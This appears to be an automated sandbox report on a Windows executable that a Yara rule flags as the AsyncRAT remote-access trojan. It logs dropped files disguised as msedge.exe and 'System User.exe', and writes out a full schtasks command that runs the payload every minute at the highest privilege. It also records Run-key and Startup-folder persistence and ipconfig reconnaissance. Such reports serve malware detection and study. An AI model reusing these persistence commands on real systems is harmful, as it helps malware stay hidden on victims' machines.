                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, qbP50VaV6GXcwq1MYN7LflNfjGaY1EnTdTMXqhGBe7CwlDFU5DK42dCawqRAoJLP4.csHigh entropy of concatenated method names: 'MXhGTmv46wi5UhuMKLIxDlmzGyV7SGmjknEIYL3cd38rdGgJN0f51QgP9wyn2zklK', 'PsuVaX6vi2YxK2FN82eAyoFLnBPEC3myeciUVh0g4hxrd5hBvKdW4tmkIJfc2rPF5', 'axoHHeKaC9uJqM3UUsG2vc0waW0Pkc4HfWmp7YncVCNKZlNWZoD6sZmdUDCkQ7Le4', 'EqQrwwEuNxMagdr276yhN8uCG2fZ2Im63WLnYY3Xjk8ALtrmRJFaK7urDnQ7U3oZx', 'WhPVdwGxGiASUSwCNVscZFrPhIPtxFVwgmuL3zSkXK90LEZpKgEUSQNukdpXV06tW', 'rrent0ANdMIraUHV8crovUBgoM9R8aVTgf2hwKfWPyItgZlhS0Ah5nmfDHHRbX9nA', 'FtaDGUbc726CncyTgQdVlNgqZTQNlinN5JIKCGsk1QXh1L61c1lGE9lTJBwcMU34z', 'qyQ13OJEfnw6cNJa4AWK3KJFjrbCGz1q7TiPiSrh7sOKMUkQhjQsNCwouKtHvdFzS', '_6c2pg3Gt4EzzUEfWShMSZcLD90vIQcf1K4tDIIFlrYiowtiJaBUYTEn0POAeyxBxL', 'I45LXYxaZ72Yz8T3SQepzItv8kDPDO4byqIBOub6l5OhFWxq5sX0MrBiZzttKiHfT'

                      Persistence and Installation Behavior

                      barindex
                      Found pyInstaller with non standard icon
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeProcess created: "C:\Users\user\Desktop\YgJ5inWPQO.exe"
                      Uses cmd line tools excessively to alter registry or file data
                      Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
                      Uses ipconfig to lookup or modify the Windows network settings
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\_socket.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\libcrypto-3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\dddd.exeJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\select.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\python313.dllJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\msedge.exeJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\_decimal.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile created: C:\Users\user\AppData\Roaming\System User.exeJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pydJump to dropped file

                      Boot Survival

                      barindex
                      Yara detected AsyncRAT
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System UserJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System UserJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF585820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7FF585820
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
